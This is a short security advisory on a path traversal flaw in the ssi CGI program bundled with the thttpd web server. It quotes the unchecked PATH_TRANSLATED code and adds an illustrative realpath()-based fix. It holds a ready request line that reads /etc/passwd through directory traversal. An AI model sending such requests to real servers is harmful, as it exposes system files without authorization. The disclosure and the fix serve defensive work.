ssi (server side includes) is a CGI proggie that comes by default with the thttpd web server; I am not sure about others. ssi has a nasty bug with regard to the PATH_TRANSLATED env var.

As the code below shows, the contents of PATH_TRANSLATED get copied into path_translated, which gets fopen()'ed later. It does no checking on the path_translated string. After it opens the file it runs the read_file() function, which returns the contents of fp. So, as you can plainly see, we can view any file on the system. Try

    GET /cgi-bin/ssi//../../../../../../../../../etc/passwd

This would yield the passwd file.

    path_translated = getenv( "PATH_TRANSLATED" );
    if ( path_translated == (char*) 0 )
        {
        internal_error( "Couldn't get PATH_TRANSLATED environment variable." );
        exit( 1 );
        }

    /* Open it. The string from the environment is used as-is, unchecked. */
    fp = fopen( path_translated, "r" );

    read_file( path_info, path_translated, fp );
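
One way to add the missing check, as an added example that is not part of the original advisory or of thttpd's code: canonicalize the path with realpath() and refuse anything that resolves outside the document root before opening it. The function names, and the use of /tmp as a stand-in document root in main(), are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700   /* for realpath() */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Resolve `path` and report whether it lies inside `root`.
** realpath() collapses "//", "." and ".." and follows symlinks, so the
** comparison uses the name that would really be opened.
** Returns 1 and fills `resolved` (PATH_MAX bytes) on success, else 0. */
int resolve_under_root(const char *root, const char *path, char *resolved)
{
    char real_root[PATH_MAX];
    size_t n;

    if (root == NULL || path == NULL)
        return 0;
    if (realpath(root, real_root) == NULL || realpath(path, resolved) == NULL)
        return 0;                       /* unresolvable: refuse */
    n = strlen(real_root);
    if (n == 1)                         /* root is "/": everything is inside */
        return 1;
    if (strncmp(resolved, real_root, n) != 0)
        return 0;
    /* Need a component boundary, so /var/www does not match /var/www2. */
    return resolved[n] == '/' || resolved[n] == '\0';
}

/* Hypothetical drop-in for the bare fopen(): NULL unless inside root. */
FILE *open_under_root(const char *root, const char *path_translated)
{
    char resolved[PATH_MAX];

    if (!resolve_under_root(root, path_translated, resolved))
        return NULL;
    return fopen(resolved, "r");        /* open the checked name */
}

int main(void)
{
    /* Constructed input: /tmp stands in for the document root. */
    const char *root = "/tmp";
    const char *req = "/tmp//../etc/passwd";
    FILE *fp = open_under_root(root, req);

    printf("%s -> %s\n", req, fp ? "opened" : "refused");
    if (fp != NULL)
        fclose(fp);
    return 0;
}
```

A path swapped between the realpath() call and the fopen() can still race the check, so the document root should not be writable by untrusted users.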